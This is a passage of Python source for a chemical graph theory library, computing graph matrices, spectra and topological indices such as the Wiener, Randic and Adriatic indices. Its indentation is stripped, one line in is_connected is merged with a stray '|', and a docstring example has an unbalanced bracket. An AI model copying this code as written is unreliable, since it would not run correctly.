n = ((ord(s[2]) - 63) << 30) + ((ord(s[3]) - 63) << 24) + (
(ord(s[4]) - 63) << 18) + ((ord(s[5]) - 63) << 12) + (
(ord(s[6]) - 63) << 6) + ord(s[7]) - 63
off = 7
self.__Order = n
k = 1
while 1 << k < n:
k += 1
data = s[off + 1:]
#print n,k
#print data
def parseData():
"""Return stream of pairs b[i], x[i] for sparse6 format."""
chunks = iter(data)
d = None # partial data word
dLen = 0 # how many unparsed bits are left in d
while 1:
if dLen < 1:
d = ord(next(chunks)) - 63
dLen = 6
dLen -= 1
b = (d >> dLen) & 1 # grab top remaining bit
x = d & ((1 << dLen) - 1) # partially built up value of x
xLen = dLen # how many bits included so far in x
while xLen < k: # now grab full chunks until we have enough
d = ord(next(chunks)) - 63
dLen = 6
x = (x << 6) + d
xLen += 6
x = (x >> (xLen - k)) # shift back the extra bits
dLen = xLen - k
yield b, x
self.__A = [[0 for col in range(n)] for row in range(n)]
self.__Edges = []
v = 0
for b, x in parseData():
if b: v += 1
if x >= n:
break # padding with ones can cause overlarge number here
elif x > v:
v = x
else:
self.__A[x][v] = 1
self.__A[v][x] = 1
self.__Edges.append((x, v))
self.__g6_string = ''
read_sparse6 = read_s6
def read_matrix(self, matrix):
"""Initialize graph from adjacency matrix including numpy.matrix"""
if type(matrix) == np.matrix:
matrix = matrix.astype(int).tolist()
self._reset_()
self.__Order = len(matrix)
self.__A = matrix
for i in range(self.__Order):
for j in range(i):
if matrix[i][j] == 1:
self.__Edges.append((i, j))
def read_edgelist(self, edges):
"""Initialize graph from list of edges.
Example:
m = mathchem.Mol()
m.read_edgelist( [(4,3),(3,1),(1,4))] )"""
# first relabel nodes
nodes = []
for e in edges:
if not e[0] in nodes: nodes.append(e[0])
if not e[1] in nodes: nodes.append(e[1])
self._reset_()
self.__Order = len(nodes)
d = dict(zip(nodes, range(len(nodes))))
self.__Edges = [(d[e[0]], d[e[1]]) for e in edges]
self.__A = [[0 for col in range(self.__Order)]
for row in range(self.__Order)]
for i, j in self.__Edges:
self.__A[i][j] = 1
self.__A[j][i] = 1
def write_dot_file(self, filename):
f_out = open(filename, 'w')
f_out.writelines('graph Mol {\n')
for (i, j) in self.edges():
f_out.writelines(' ' + str(i) + ' -- ' + str(j) + ';\n')
f_out.writelines('}')
f_out.close()
#
#
# matrices
#
#
def adjacency_matrix(self):
""" Return Adjacency matrix
Alias : A
"""
return self.__A
A = adjacency_matrix
def incidence_matrix(self):
""" Return Incidence matrix
Alias: B
"""
if self.__B == []:
def func(u, v):
col = [0] * self.__Order
col[u] = 1
col[v] = 1
return col
# apply func to each edge
b = map(lambda e: func(e), self.edges())
# transpose the result
self.__B = map(list, zip(*b))
return self.__B
B = incidence_matrix
def laplacian_matrix(self):
""" Return Laplacian matrix
L = D-A
where D - matrix whose diagonal elements are the degrees of the corresponding vertices
A - adjacency matrix
Alias : L
"""
if self.__L == []:
self.__L = np.diag(self.degrees()) - np.matrix(self.__A)
return self.__L
L = laplacian_matrix
def signless_laplacian_matrix(self):
""" Return Signless Laplacian matrix
Q = D+A
Alias : Q
"""
if self.__Q == []:
self.__Q = np.diag(self.degrees()) + np.matrix(self.__A)
return self.__Q
Q = signless_laplacian_matrix
def normalized_laplacian_matrix(self):
""" Return Normalized Laplacian matrix
NL = deg^(-1/2) * L * deg(1/2)
Alias : NL
"""
## TODO: check if we have zeros in degrees()
if self.__NL == []:
d1 = np.diag(np.power(self.degrees(), -.5))
d2 = np.diag(np.power(self.degrees(), .5))
self.__NL = d1 * self.laplacian_matrix() * d2
return self.__NL
NL = normalized_laplacian_matrix
def distance_matrix(self):
""" Return Distance matrix
Alias : D
"""
if self.__Order == 0: return []
if self.__D == []:
# use here float only for using np.inf - infinity
A = np.matrix(self.__A, dtype=float)
n, m = A.shape
I = np.identity(n)
A[A == 0] = np.inf # set zero entries to inf
A[I == 1] = 0 # except diagonal which should be zero
for i in range(n):
r = A[i, :]
A = np.minimum(A, r + r.T)
self.__D = np.matrix(A, dtype=int)
return self.__D
D = distance_matrix
def reciprocal_distance_matrix(self):
""" Return Reciprocal Distance matrix """
rd = np.matrix(self.distance_matrix(), dtype=float)
# probably there exists more python way to apply a function to each element of matrix
for i in range(self.__Order):
for j in range(self.__Order):
if not rd[i, j] == 0: rd[i, j] = 1 / rd[i, j]
return rd
def resistance_distance_matrix(self):
""" Return Resistance Distance matrix """
if not self.is_connected() or self.__Order == 0:
return False
if self.__RD == []:
#from numpy import linalg as la
n = self.__Order
s = n * self.laplacian_matrix() + 1
sn = n * np.linalg.inv(s)
RD = np.ndarray((n, n))
for i in range(n):
for j in range(n):
RD[i, j] = np.float64(
np.longdouble(sn[i, i]) + np.longdouble(sn[j, j]) -
2 * np.longdouble(sn[i, j]))
self.__RD = RD
return self.__RD
def seidel_matrix(self):
""" Return Seidel matrix
S = J - I - 2A
Alias: S
"""
n = self.__Order
return np.ones((n, n)) - np.identity(n) - 2 * np.matrix(self.__A)
S = seidel_matrix
#
#
# Graph invariants
#
#
def diameter(self):
""" Return diameter of the graph
Diameter is the maximum value of distance matrix
"""
if self.__Order == 0: return 0
return self.distance_matrix().max()
def degrees(self):
""" Return degree of the vertex
Alias : deg
"""
if self.__Degrees == []:
self.__Degrees = map(lambda r: sum(r), self.__A)
## calcuate degrees for all vertices
return self.__Degrees
deg = degrees
def eccentricity(self):
""" Eccentricity of the graph for all its vertices"""
if self.__Order == 0: return None
return self.distance_matrix().max(axis=0).tolist()[0]
def distances_from_vertex(self, v):
""" Return list of all distances from a given vertex to all others"""
# used to test graph where it is connected or not
seen = {}
level = 0
nextlevel = [v]
while nextlevel:
thislevel = nextlevel
nextlevel = []
for v in thislevel:
if v not in seen:
seen[v] = level
nb = [
i
for (i, j) in zip(range(len(self.__A[v])), self.__A[v])
if j != 0
]
nextlevel.extend(nb)
#if (cutoff is not None and cutoff <= level): break
level = level + 1
return seen
def is_connected(self):
""" Return True/False depends on the graph is connected or not """
if self.__Order == 0: return False
if not self.__Check_connectedness: return True | if self.__Is_connected is None:
# we take vertex 0 and check whether we can reach all other vertices
self.__Is_connected = len(
self.distances_from_vertex(0)) == self.order()
return self.__Is_connected
#
#
# Graph spectra
#
#
def spectrum(self, matrix="adjacency"):
r""" Spectrum of the graph
args:
matrix (str or matrix)
'adjacency' or 'A' : default
'laplacian' or 'L'
'distance' or 'D'
'signless_laplacian' or 'Q'
'normalized_laplacian' or 'NL'
'resistance_distance' or 'RD'
'reciprocal_distance'
arbitrary matrix
"""
from numpy import linalg as la
if type(matrix) is str:
if self.__Order == 0: return []
if matrix == "adjacency" or matrix == "A":
if self.__Spectrum == []:
s = la.eigvalsh(self.__A).tolist()
s.sort(reverse=True)
self.__Spectrum = s
return self.__Spectrum
elif matrix == "laplacian" or matrix == "L":
if self.__Laplacian_spectrum == []:
s = la.eigvalsh(self.laplacian_matrix()).tolist()
s.sort(reverse=True)
self.__Laplacian_spectrum = map(
lambda x: x if x > 0 else 0, s)
return self.__Laplacian_spectrum
elif matrix == "distance" or matrix == "D":
if self.__Distance_spectrum == []:
s = la.eigvalsh(self.distance_matrix()).tolist()
s.sort(reverse=True)
self.__Distance_spectrum = s
return self.__Distance_spectrum
elif matrix == "signless_laplacian" or matrix == "Q":
if self.__Signless_laplacian_spectrum == []:
## TODO: check if we have zeros in degrees()
s = la.eigvalsh(self.signless_laplacian_matrix()).tolist()
s.sort(reverse=True)
self.__Signless_laplacian_spectrum = map(
lambda x: x if x > 0 else 0, s)
return self.__Signless_laplacian_spectrum
elif matrix == "normalized_laplacian" or matrix == "NL":
if self.__Norm_laplacian_spectrum == []:
## TODO: check if we have zeros in degrees()
s = la.eigvalsh(
self.normalized_laplacian_matrix()).tolist()
s.sort(reverse=True)
self.__Norm_laplacian_spectrum = s
return self.__Norm_laplacian_spectrum
elif matrix == "resistance_distance" or matrix == "RD":
if self.__RD_spectrum == []:
s = la.eigvalsh(self.resistance_distance_matrix()).tolist()
s.sort(reverse=True)
self.__RD_spectrum = s
return self.__RD_spectrum
# NO CACHE
elif matrix == "reciprocal_distance":
s = la.eigvalsh(self.reciprocal_distance_matrix()).tolist()
s.sort(reverse=True)
return s
else:
return False
# if the parameter is an arbitrary matrix
# DEPRECATED:
# use mathchem.spectrum(matrix) for arbitrary matrices
#
else:
s = la.eigvalsh(matrix).tolist()
s.sort(reverse=True)
return s
# for arbitrary matrices use:
# mathchem.spectral_moment(matrix)
def spectral_moment(self, k, matrix="adjacency"):
""" Return k-th spectral moment
parameters: matrix - see spectrum help
"""
return np.sum(np.power(self.spectrum(matrix), k))
# for arbitrary matrices use:
# mathchem.spectral_radius(matrix)
def spectral_radius(self, matrix="adjacency"):
s = self.spectrum(matrix)
return max(abs(s[0]), abs(s[len(s) - 1]))
# for arbitrary matrices use:
# mathchem.energy(matrix)
def energy(self, matrix="adjacency"):
""" Return energy of the graph
parameters: matrix - see spectrum help
"""
if self.__Order == 0: return False
s = self.spectrum(matrix)
a = np.sum(s, dtype=np.longdouble) / len(s)
return np.float64(
np.sum(map(lambda x: abs(x - a), s), dtype=np.longdouble))
def incidence_energy(self):
""" Return incidence energy (IE)
Incidence energy is the sum of singular values of incidence matrix
"""
if self.__Order == 0: return False
from numpy.linalg import svd
return np.float64(
np.sum(svd(self.incidence_matrix(), compute_uv=False),
dtype=np.longdouble))
#
#
# Chemical indices
#
#
def zagreb_m1_index(self):
""" Zagreb M1 Index """
return sum(map(lambda d: d**2, self.degrees()))
def zagreb_m2_index(self):
""" Zagreb M2 Index
The molecular graph must contain at least one edge, otherwise the function Return False
Zagreb M2 Index is a special case of Connectivity Index with power = 1"""
return sum(
map(lambda e1, e2: self.degrees()[e1] * self.degrees()[e2],
self.edges()))
def zagreb_m1_coindex(self):
""" Zagreb M1 Coindex """
return 2 * self.size() * (self.__Order - 1) - self.zagreb_m1_index()
def zagreb_m2_coindex(self):
""" Zagreb M2 Coindex """
return 2 * (self.size()**
2) - self.zagreb_m2_index() - self.zagreb_m1_index() * .5
def connectivity_index(self, power):
""" Connectivity index (R)"""
E = self.edges() # E - all edges
if len(E) == 0: return 0
return np.float64(
np.sum(map(
lambda e1, e2:
(self.degrees()[e1] * self.degrees()[e2])**power, E),
dtype=np.longdouble))
def augmented_zagreb_index(self):
""" Augmented Zagreb Index"""
E = self.edges() # E - all edges
d = self.degrees()
if len(E) < 2: return 0
return np.float64(
np.sum(map(
lambda e1, e2: (np.longdouble(d[e1] * d[e2]) /
(d[e1] + d[e2] - 2))**3, E),
dtype=np.longdouble))
def sum_connectivity_index(self):
""" Sum-Connectivity index"""
E = self.edges() # E - all edges
if len(E) == 0: return 0
return np.float64(
np.sum(map(
lambda e1, e2:
(self.degrees()[e1] + self.degrees()[e2])**(-0.5), E),
dtype=np.longdouble))
def geometric_arithmetic_index(self):
""" Geometric-Arithmetic index"""
E = self.edges() # E - all edges
if len(E) == 0: return 0
return np.float64(
np.sum(map(
lambda e1, e2: 2.0 * np.sqrt(self.degrees()[e1] * self.degrees(
)[e2]) / (self.degrees()[e1] + self.degrees()[e2]), E),
dtype=np.longdouble))
def eccentric_connectivity_index(self):
""" Eccentric Connectivity Index
The molecuar graph must be connected, otherwise the function Return False"""
if not self.is_connected():
return False
return sum(map(lambda a, b: a * b, self.degrees(),
self.eccentricity()))
def randic_index(self):
""" Randic Index
The molecular graph must contain at least one edge, otherwise the function Return False
Randic Index is a special case of Connectivity Index with power = -1/2"""
return self.connectivity_index(-0.5)
def atom_bond_connectivity_index(self):
""" Atom-Bond Connectivity Index (ABC) """
s = np.longdouble(0) # summator
for u, v in self.edges():
d1 = np.float64(self.degrees()[u])
d2 = np.float64(self.degrees()[v])
s += np.longdouble(((d1 + d2 - 2) / (d1 * d2))**.5)
return np.float64(s)
def estrada_index(self, matrix="adjacency"):
""" Estrada Index (EE)
args:
matrix -- see spectrum for help, default value is 'adjacency'
There is an alias 'distance_estrada_index' for distance matrix
"""
return np.float64(
np.sum(map(lambda x: np.exp(x.real), self.spectrum(matrix)),
dtype=np.longdouble))
def distance_estrada_index(self):
""" Distance Estrada Index (DEE)
Special case of Estrada index with distance matrix
"""
return self.estrada_index('distance')
def degree_distance(self):
""" Degree Distance (DD)
The molecuar graph must be connected, otherwise the function Return False"""
if not self.is_connected():
return False
dd = np.matrix(self.degrees()) * self.distance_matrix().sum(axis=1)
return dd[0, 0]
def reverse_degree_distance(self):
""" Reverse Distance Degree (rDD)
The molecuar graph must be connected, otherwise the function Return False"""
if not self.is_connected():
return False
return 2 * (self.order() - 1) * len(
self.edges()) * self.diameter() - self.degree_distance()
def molecular_topological_index(self):
""" (Schultz) Molecular Topological Index (MTI)
The molecuar graph must be connected, otherwise the function Return False"""
if not self.is_connected():
return False
# (A+D)*d
A = np.matrix(self.__A)
d = np.matrix(self.degrees())
return np.float64(
((A + self.distance_matrix()) * d.T).sum(dtype=np.longdouble))
def eccentric_distance_sum(self):
""" Distance Sum
The molecuar graph must be connected, otherwise the function Return False"""
if not self.is_connected():
return False
return (self.eccentricity() * self.distance_matrix().sum(axis=1))[0, 0]
# strange - it is slow ((
def balaban_j_index(self):
""" Balaban J index
The molecuar graph must be connected, otherwise the function Return False"""
if not self.is_connected():
return False
ds = self.distance_matrix().sum(axis=1)
m = len(self.edges())
k = (m / (m - self.__Order + 2.0))
return np.float64(
k *
np.sum(map(lambda u, v: 1 / np.sqrt(
(ds[u][0, 0] * ds[v][0, 0])), self.edges()),
dtype=np.longdouble))
def sum_balaban_index(self):
""" Sum Balaban index
The molecuar graph must be connected, otherwise the function Return False"""
if not self.is_connected():
return False
ds = self.distance_matrix().sum(axis=1)
m = len(self.edges())
k = (m / (m - self.__Order + 2.0))
return np.float64(
k *
np.sum(map(lambda u, v: 1 / np.sqrt(
(ds[u][0, 0] + ds[v][0, 0])), self.edges()),
dtype=np.longdouble))
def kirchhoff_index(self):
""" Kirchhoff Index (Kf)
Kf = 1/2 * sum_i sum_j RD[i,j]
Based on resistance distance matrix RD
Alias: resistance
The molecuar graph must be connected, otherwise the function Return False
"""
if not self.is_connected():
return False
return np.float64(
self.resistance_distance_matrix().sum(dtype=np.longdouble) / 2)
resistance = kirchhoff_index
def wiener_index(self):
""" Wiener Index (W)
W = 1/2 * sum_i sum_j D[i,j]
where D is distance matrix
The molecuar graph must be connected, otherwise the function Return False
"""
if not self.is_connected():
return False
return self.distance_matrix().sum(dtype=np.float64) / 2
def terminal_wiener_index(self):
""" Calculate Terminal Wiener Index (TW)
TW = Sum of all distances between pendent vertices (with degree = 1)
"""
if not self.is_connected(): return False
s = 0
for u in range(self.order()):
if self.degrees()[u] != 1: continue
for v in range(u + 1, self.order()):
if self.degrees()[v] == 1:
s = s + self.distance_matrix()[u, v]
return s
def reverse_wiener_index(self):
""" Reverse Wiener Index (RW)
RW = 1/2 * sum_i!=j ( d - D[i,j] )
where D is distance matrix and d is diameter
The molecuar graph must be connected, otherwise the function Return False
"""
if not self.is_connected():
return False
# here we use formula: RW = 1/2 * n * (n-1) * d - W
return self.diameter() * (
self.__Order * (self.__Order - 1)) / 2 - self.wiener_index()
def hyper_wiener_index(self):
""" Hyper-Wiener Index (WW)
WW = 1/2 * ( sum_ij d(i,j)^2 + sum_i_j d(i,j) )
where D is distance matrix
The molecuar graph must be connected, otherwise the function Return False
"""
if not self.is_connected():
return False
return (
np.power(self.distance_matrix(), 2).sum() +
self.distance_matrix().sum()) / 4 # since we have symmetric matrix
def harary_index(self):
""" Harary Index (H)
H = 1/2 sum_i sum_j Rd[i,j]
where Rd is reciprocal distance matrix
Rd[i,j] = 1 / D[i,j] for D[i,j] != 0
Rd[i,j] = 0 otherwise
The molecuar graph must be connected, otherwise the function Return False
"""
if not self.is_connected():
return False
return np.float64(
self.reciprocal_distance_matrix().sum(dtype=np.longdouble)) / 2
def LEL(self):
""" Return Laplacian-like energy (LEL) """
return np.float64(
np.sum(map(lambda x: np.sqrt(x), self.spectrum('laplacian')),
dtype=np.longdouble))
def multiplicative_sum_zagreb_index(self):
""" Log( Multiplicative Sum Zagreb index )"""
d = self.degrees()
return np.float64(
np.sum(map(lambda u, v: np.log(np.float64(d[u] + d[v])),
self.edges()),
dtype=np.longdouble))
def multiplicative_p2_zagreb_index(self):
"""Calculates Log( Multiplicative P2 Zagreb index )"""
d = self.degrees()
return np.float64(
np.sum(map(lambda u, v: np.log(np.float64(d[u] * d[v])),
self.edges()),
dtype=np.longdouble))
def multiplicative_p1_zagreb_index(self):
"""Calculates Log( Multiplicative P1 Zagreb index )"""
d = self.degrees()
return np.float64(
np.sum(map(lambda v: np.log(np.float64(d[v]**2)), self.vertices()),
dtype=np.longdouble))
def szeged_index(self):
"""Calculates Szeged index"""
if not self.is_connected():
return False
s = 0
D = self.distance_matrix()
for u, v in self.edges():
diff = D[u, :] - D[v, :]
s += (diff > 0).sum() * (diff < 0).sum()
return float(s)
def revised_szeged_index(self):
"""Calculates Revised Szeged index"""
if not self.is_connected():
return False
s = 0.0
D = self.distance_matrix()
for u, v in self.edges():
diff = D[u, :] - D[v, :]
o = (diff == 0).sum()
s += ((diff > 0).sum() + .5 * o) * ((diff < 0).sum() + .5 * o)
return s
def homo_lumo_index(self):
"""Calculates HOMO-LUMO index"""
if not self.is_connected():
return False
n = self.order()
if n % 2 == 0:
h = int(n / 2 -
1) # because array indices start from 0 instead of 1
l = int(h + 1)
return max([abs(self.spectrum()[h]), abs(self.spectrum()[l])])
# else:
h = int((n - 1) / 2)
return abs(self.spectrum()[h])
HL_index = homo_lumo_index
# Adriatic indices
# DEPRECATED
# use mathchem.all_adriatic()
def all_adriatic(self):
""" Generate all possible parameters sets for adriatic indices"""
r = []
for p in [0, 1]:
for i in [1, 2, 3]:
for j in range(1, 9):
if i == 3:
for a in [0.5, 2]:
r.append((p, i, j, a))
elif i == 2 and j in range(1, 6):
for a in [-1, -0.5, 0.5, 1, 2]:
r.append((p, i, j, a))
elif i == 2 or i == 1:
for a in [0.5, 1, 2]:
r.append((p, i, j, a))
return r
def adriatic_name(self, p, i, j, a):
""" Return the name for given parameters of Adriatic indices"""
#(j)
name1 = {1:'Randic type ',\
2:'sum ',\
3:'inverse sum ', \
4:'misbalance ', \
5:'inverse misbalance ', \
6:'min-max ', \
7:'max-min ', \
8:'symmetric division '}
# (i,a)
name2 = {(1, 0.5):'lor',\
(1,1):'lo', \
(1,2):'los', \
(2,-1):'in', \
(2, -0.5):'ir', \
(2, 0.5):'ro', \
(2,1):'', \
(2,2):'s', \
(3, 0.5):'ha', \
(3,2):'two'}
#(p)
name3 = {0: 'deg', 1: 'di'}
return (name1[j] + name2[(i, a)] + name3[p])
def _adriatic_entry_(self, du, dv, i, j, a):
""" Return an individual edge contribution for Adriatic indices and matrices"""
# phi(x,a)
phi = {
1: lambda x, a: np.log(x)**a,
2: lambda x, a: x**a,
3: lambda x, a: a**x
}
# gamma (x,y)
gamma = {\
1: lambda x,y: x*y,\
2: lambda x,y: x+y,\
3: lambda x,y: 0 if x+y==0 else 1.0/(x+y),\
4: lambda x,y: abs(x-y),\
5: lambda x,y: 0 if x==y else 1.0/abs(x-y),\
6: lambda x,y: 0 if max(x,y)==0 else min(x,y)/max(x,y),\
7: lambda x,y: 0 if min(x,y)==0 else max(x,y)/min(x,y),\
8: lambda x,y: 0 if x==0 or y==0 else x/y+y/x}
return gamma[j](phi[i](du, a), phi[i](dv, a))
def adriatic_matrix(self, p, i, j, a):
""" Return the Adriatic matrix with given parameters"""
if p == 0: d = self.degrees()
else: d = self.distance_matrix().sum(axis=0).tolist()[0]
AM = [[0] * self.order() for k in range(self.order())]
for u, v in self.edges():
AM[u][v] = AM[v][u] = self._adriatic_entry_(
np.float64(d[u]), np.float64(d[v]), i, j, a)
return AM
def adriatic_index(self, p, i, j, a):
""" Return the Adriatic index with given parameters"""
if p == 0: d = self.degrees()
else: d = self.distance_matrix().sum(axis=0).tolist()[0]
func = lambda u, v: self._adriatic_entry_(np.float64(d[u]),
np.float64(d[v]), i, j, a)
return np.float64(np.sum(map(func, self.edges()), dtype=np.longdouble))
# Adriatic indices by names
def randic_type_lordeg_index(self):
""" Adriatic index: Randic type lordeg index"""
return self.adriatic_index(0, 1, 1, 0.5)
def randic_type_lodeg_index(self):
""" Adriatic index: Randic type lodeg index"""
return self.adriatic_index(0, 1, 1, 1)
def randic_type_losdeg_index(self):
""" Adriatic index: Randic type losdeg index"""
return self.adriatic_index(0, 1, 1, 2)
def sum_lordeg_index(self):
""" Adriatic index: sum lordeg index"""
return self.adriatic_index(0, 1, 2, 0.5)
def sum_lodeg_index(self):
""" Adriatic index: sum lodeg index"""
return self.adriatic_index(0, 1, 2, 1)
def sum_losdeg_index(self):
""" Adriatic index: sum losdeg index"""
return self.adriatic_index(0, 1, 2, 2)
def inverse_sum_lordeg_index(self):
""" Adriatic index: inverse sum lordeg index"""
return self.adriatic_index(0, 1, 3, 0.5)
def inverse_sum_lodeg_index(self):
""" Adriatic index: inverse sum lodeg index"""
return self.adriatic_index(0, 1, 3, 1)
def inverse_sum_losdeg_index(self):
""" Adriatic index: inverse sum losdeg index"""
return self.adriatic_index(0, 1, 3, 2)
def misbalance_lordeg_index(self):
""" Adriatic index: misbalance lordeg index"""
return self.adriatic_index(0, 1, 4, 0.5)
def misbalance_lodeg_index(self):
""" Adriatic index: misbalance lodeg index"""
return self.adriatic_index(0, 1, 4, 1)
def misbalance_losdeg_index(self):
""" Adriatic index: misbalance losdeg index"""
return self.adriatic_index(0, 1, 4, 2)
def inverse_misbalance_lordeg_index(self):
""" Adriatic index: inverse misbalance lordeg index"""
return self.adriatic_index(0, 1, 5, 0.5)
def inverse_misbalance_lodeg_index(self):
""" Adriatic index: inverse misbalance lodeg index"""
return self.adriatic_index(0, 1, 5, 1)
def inverse_misbalance_losdeg_index(self):
""" Adriatic index: inverse misbalance losdeg index"""
return self.adriatic_index(0, 1, 5, 2)
def min_max_lordeg_index(self):
""" Adriatic index: min-max lordeg index"""
return self.adriatic_index(0, 1, 6, 0.5)
def min_max_lodeg_index(self):
""" Adriatic index: min-max lodeg index"""
return self.adriatic_index(0, 1, 6, 1)
def min_max_losdeg_index(self):
""" Adriatic index: min-max losdeg index"""
return self.adriatic_index(0, 1, 6, 2)
def max_min_lordeg_index(self):
""" Adriatic index: max-min lordeg index"""
return self.adriatic_index(0, 1, 7, 0.5)
def max_min_lodeg_index(self):
""" Adriatic index: max-min lodeg index"""
return self.adriatic_index(0, 1, 7, 1)
def max_min_losdeg_index(self):
""" Adriatic index: max-min losdeg index"""
return self.adriatic_index(0, 1, 7, 2)
def symmetric_division_lordeg_index(self):
""" Adriatic index: symmetric division lordeg index"""
return self.adriatic_index(0, 1, 8, 0.5)
def symmetric_division_lodeg_index(self):
""" Adriatic index: symmetric division lodeg index"""
return self.adriatic_index(0, 1, 8, 1)
def symmetric_division_losdeg_index(self):
""" Adriatic index: symmetric division losdeg index"""
return self.adriatic_index(0, 1, 8, 2)
def randic_type_indeg_index(self):
""" Adriatic index: Randic type indeg index"""
return self.adriatic_index(0, 2, 1, -1)
def randic_type_irdeg_index(self):
""" Adriatic index: Randic type irdeg index"""
return self.adriatic_index(0, 2, 1, -0.5)
def randic_type_rodeg_index(self):
""" Adriatic index: Randic type rodeg index"""
return self.adriatic_index(0, 2, 1, 0.5)
def randic_type_deg_index(self):
""" Adriatic index: Randic type deg index"""
return self.adriatic_index(0, 2, 1, 1)
def randic_type_sdeg_index(self):
""" Adriatic index: Randic type sdeg index"""
return self.adriatic_index(0, 2, 1, 2)
def sum_indeg_index(self):
""" Adriatic index: sum indeg index"""
return self.adriatic_index(0, 2, 2, -1)
def sum_irdeg_index(self):
""" Adriatic index: sum irdeg index"""
return self.adriatic_index(0, 2, 2, -0.5)
def sum_rodeg_index(self):
""" Adriatic index: sum rodeg index"""
return self.adriatic_index(0, 2, 2, 0.5)
def sum_deg_index(self):
""" Adriatic index: sum deg index"""
return self.adriatic_index(0, 2, 2, 1)
def sum_sdeg_index(self):
""" Adriatic index: sum sdeg index"""
return self.adriatic_index(0, 2, 2, 2)
def inverse_sum_indeg_index(self):
""" Adriatic index: inverse sum indeg index"""
return self.adriatic_index(0, 2, 3, -1)
def inverse_sum_irdeg_index(self):
""" Adriatic index: inverse sum irdeg index"""
return self.adriatic_index(0, 2, 3, -0.5)
def inverse_sum_rodeg_index(self):
""" Adriatic index: inverse sum rodeg index"""
return self.adriatic_index(0, 2, 3, 0.5)
def inverse_sum_deg_index(self):
""" Adriatic index: inverse sum deg index"""
return self.adriatic_index(0, 2, 3, 1)
def inverse_sum_sdeg_index(self):
""" Adriatic index: inverse sum sdeg index"""
return self.adriatic_index(0, 2, 3, 2)
def misbalance_indeg_index(self):
""" Adriatic index: misbalance indeg index"""
return self.adriatic_index(0, 2, 4, -1)
def misbalance_irdeg_index(self):
""" Adriatic index: misbalance irdeg index"""
return self.adriatic_index(0, 2, 4, -0.5)
def misbalance_rodeg_index(self):
""" Adriatic index: misbalance rodeg index"""
return self.adriatic_index(0, 2, 4, 0.5)
def misbalance_deg_index(self):
""" Adriatic index: misbalance deg index"""
return self.adriatic_index(0, 2, 4, 1)
def misbalance_sdeg_index(self):
""" Adriatic index: misbalance sdeg index"""
return self.adriatic_index(0, 2, 4, 2)
def inverse_misbalance_indeg_index(self):
""" Adriatic index: inverse misbalance indeg index"""
return self.adriatic_index(0, 2, 5, -1)
def inverse_misbalance_irdeg_index(self):
""" Adriatic index: inverse misbalance irdeg index"""
return self.adriatic_index(0, 2, 5, -0.5)
def inverse_misbalance_rodeg_index(self):
""" Adriatic index: inverse misbalance rodeg index"""
return self.adriatic_index(0, 2, 5, 0.5)
def inverse_misbalance_deg_index(self):
""" Adriatic index: inverse misbalance deg index"""
return self.adriatic_index(0, 2, 5, 1)
def inverse_misbalance_sdeg_index(self):
""" Adriatic index: inverse misbalance sdeg index"""
return self.adriatic_index(0, 2, 5, 2)
def min_max_rodeg_index(self):
""" Adriatic index: min-max rodeg index"""
return self.adriatic_index(0, 2, 6, 0.5)
def min_max_deg_index(self):
""" Adriatic index: min-max deg index"""
return self.adriatic_index(0, 2, 6, 1)
def min_max_sdeg_index(self):
""" Adriatic index: min-max sdeg index"""
return self.adriatic_index(0, 2, 6, 2)
def max_min_rodeg_index(self):
""" Adriatic index: max-min rodeg index"""
return self.adriatic_index(0, 2, 7, 0.5)
def max_min_deg_index(self):
""" Adriatic index: max-min deg index"""
return self.adriatic_index(0, 2, 7, 1)
def max_min_sdeg_index(self):
""" Adriatic index: max-min sdeg index"""
return self.adriatic_index(0, 2, 7, 2)
def symmetric_division_rodeg_index(self):
""" Adriatic index: symmetric division rodeg index"""
return self.adriatic_index(0, 2, 8, 0.5)
def symmetric_division_deg_index(self):
""" Adriatic index: symmetric division deg index"""
return self.adriatic_index(0, 2, 8, 1)
def symmetric_division_sdeg_index(self):
""" Adriatic index: symmetric division sdeg index"""
return self.adriatic_index(0, 2, 8, 2)
def randic_type_hadeg_index(self):
""" Adriatic index: Randic type hadeg index"""
return self.adriatic_index(0, 3, 1, 0.5)
def randic_type_twodeg_index(self):
""" Adriatic index: Randic type twodeg index"""
return self.adriatic_index(0, 3, 1, 2)
def sum_hadeg_index(self):
""" Adriatic index: sum hadeg index"""
return self.adriatic_index(0, 3, 2, 0.5)
def sum_twodeg_index(self):
""" Adriatic index: sum twodeg index"""
return self.adriatic_index(0, 3, 2, 2)
def inverse_sum_hadeg_index(self):
""" Adriatic index: inverse sum hadeg index"""
return self.adriatic_index(0, 3, 3, 0.5)
def inverse_sum_twodeg_index(self):
""" Adriatic index: inverse sum twodeg index"""
return self.adriatic_index(0, 3, 3, 2)
def misbalance_hadeg_index(self):
""" Adriatic index: misbalance hadeg index"""
return self.adriatic_index(0, 3, 4, 0.5)
def misbalance_twodeg_index(self):
""" Adriatic index: misbalance twodeg index"""
return self.adriatic_index(0, 3, 4, 2)
def inverse_misbalance_hadeg_index(self):
""" Adriatic index: inverse misbalance hadeg index"""
return self.adriatic_index(0, 3, 5, 0.5)
def inverse_misbalance_twodeg_index(self):
""" Adriatic index: inverse misbalance twodeg index"""
return self.adriatic_index(0, 3, 5, 2)
def min_max_hadeg_index(self):
""" Adriatic index: min-max hadeg index"""
return self.adriatic_index(0, 3, 6, 0.5)
def min_max_twodeg_index(self):
""" Adriatic index: min-max twodeg index"""
return self.adriatic_index(0, 3, 6, 2)
def max_min_hadeg_index(self):
""" Adriatic index: max-min hadeg index"""
return self.adriatic_index(0, 3, 7, 0.5)
def max_min_twodeg_index(self):
""" Adriatic index: max-min twodeg index"""
return self.adriatic_index(0, 3, 7, 2)
def symmetric_division_hadeg_index(self):
""" Adriatic index: symmetric division hadeg index"""
return self.adriatic_index(0, 3, 8, 0.5)
def symmetric_division_twodeg_index(self):
""" Adriatic index: symmetric division twodeg index"""
return self.adriatic_index(0, 3, 8, 2)
def randic_type_lordi_index(self):
""" Adriatic index: Randic type lordi index"""
return self.adriatic_index(1, 1, 1, 0.5)
def randic_type_lodi_index(self):
""" Adriatic index: Randic type lodi index"""
return self.adriatic_index(1, 1, 1, 1)
def randic_type_losdi_index(self):
""" Adriatic index: Randic type losdi index"""
return self.adriatic_index(1, 1, 1, 2)
def sum_lordi_index(self):
""" Adriatic index: sum lordi index"""
return self.adriatic_index(1, 1, 2, 0.5)
def sum_lodi_index(self):
""" Adriatic index: sum lodi index"""
return self.adriatic_index(1, 1, 2, 1)
def sum_losdi_index(self):
""" Adriatic index: sum losdi index"""
return self.adriatic_index(1, 1, 2, 2)
def inverse_sum_lordi_index(self):
""" Adriatic index: inverse sum lordi index"""
return self.adriatic_index(1, 1, 3, 0.5)
def inverse_sum_lodi_index(self):
""" Adriatic index: inverse sum lodi index"""
